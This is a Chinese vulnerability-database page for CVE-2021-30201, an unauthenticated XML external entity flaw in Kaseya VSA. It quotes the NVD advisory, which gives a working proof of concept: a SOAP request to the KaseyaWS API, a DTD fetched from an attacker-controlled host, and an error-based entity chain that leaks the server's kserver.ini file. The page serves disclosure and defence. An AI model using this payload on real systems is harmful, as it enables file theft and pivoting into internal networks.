目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1310

100%

CVE-2021-30201— Kaseya VSA 代码问题漏洞

CVSS 7.5 · High EPSS 0.33% · P56
获取后续新漏洞提醒登录后订阅

一、 漏洞 CVE-2021-30201 基础信息

漏洞信息

对漏洞内容有疑问?看看神龙的深度分析是否有帮助!
查看神龙十问 ↗

尽管我们使用了先进的大模型技术,但其输出仍可能包含不准确或过时的信息。神龙努力确保数据的准确性,但请您根据实际情况进行核实和判断。

Vulnerability Title
Unauthenticated XML External Entity vulnerability in Kaseya VSA < v9.5.6
来源: 美国国家漏洞数据库 NVD
Vulnerability Description
The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:kas="KaseyaWS"> <soapenv:Header/> <soapenv:Body> <kas:PrimitiveResetPassword> <!--type: string--> <kas:XmlRequest><![CDATA[<!DOCTYPE data SYSTEM "http://192.168.1.170:8080/oob.dtd"><data>&send;</data>]]> </kas:XmlRequest> </kas:PrimitiveResetPassword> </soapenv:Body> </soapenv:Envelope> ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` <!ENTITY % file SYSTEM "file://c:\\kaseya\\kserver\\kserver.ini"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\kaseya\\kserver\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>Server was unable to process request. ---&gt; There is an error in XML document (24, -1000).\r\n\r\nSystem.Xml.XmlException: Fragment identifier '######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## <snip> ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network.
来源: 美国国家漏洞数据库 NVD
CVSS Information
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
来源: 美国国家漏洞数据库 NVD
Vulnerability Type
N/A
来源: 美国国家漏洞数据库 NVD
Vulnerability Title
Kaseya VSA 代码问题漏洞
来源: 中国国家信息安全漏洞库 CNNVD
Vulnerability Description
Kaseya VSA是美国Kaseya公司的托管服务提供商 (MSP) 常用来管理客户网络的RMM(远程监控和管理)软件。 Kaseya VSA 9.5.6 之前版本存在代码问题漏洞,该漏洞源于外部输入数据构造代码段的过程中,网络系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞生成非法的代码段,修改网络系统或组件的预期的执行控制流。
来源: 中国国家信息安全漏洞库 CNNVD
CVSS Information
N/A
来源: 中国国家信息安全漏洞库 CNNVD
Vulnerability Type
N/A
来源: 中国国家信息安全漏洞库 CNNVD

受影响产品

厂商产品影响版本CPE订阅
-n/a n/a -

二、漏洞 CVE-2021-30201 的公开POC

#POC 描述源链接神龙链接
AI 生成 POC高级

未找到公开 POC。

登录以生成 AI POC

三、漏洞 CVE-2021-30201 的情报信息

登录查看更多情报信息。

CVE-2021-30201 其他参考 (4)

同批安全公告 · n/a · 2021-07-09 · 共 49 条

CVE-2021-3011610.0 CRITICALKaseya VSA 输入验证错误漏洞
CVE-2021-301209.9 CRITICALKaseya VSA 安全漏洞
CVE-2021-301189.8 CRITICALKaseya VSA RMM 代码问题漏洞
CVE-2021-301179.8 CRITICALKaseya VSA SQL注入漏洞
CVE-2021-234058.3 HIGHPimcore SQL注入漏洞
CVE-2021-301216.5 MEDIUMKaseya VSA 代码注入漏洞
CVE-2021-301195.4 MEDIUMKaseya VSA 跨站脚本漏洞
CVE-2020-35987Rukovoditel 跨站脚本漏洞
CVE-2020-25875Codoforum 跨站脚本漏洞
CVE-2020-25876Codoforum 跨站脚本漏洞
CVE-2020-25394moziloCMS 跨站脚本漏洞
CVE-2020-21333PublicCMS 跨站脚本漏洞
CVE-2021-35358Dotcms dotCMS 跨站脚本漏洞
CVE-2021-35361Dotcms dotCMS 跨站脚本漏洞
CVE-2021-35360Dotcms dotCMS 跨站脚本漏洞
CVE-2021-36371Emissary-Ingress 信任管理问题漏洞
CVE-2021-33214Hms Networks eCatcher 安全漏洞
CVE-2021-33792Foxit Reader 和 Foxit PhantomPDF 缓冲区错误漏洞
CVE-2021-33795Foxit Reader和Foxit PhantomPDF 安全漏洞
CVE-2021-27038Autodesk Design Review 安全漏洞

显示前 20 条,共 49 条。 查看全部 &rarr; →

IV. Related Vulnerabilities

V. Comments for CVE-2021-30201

暂无评论


发表评论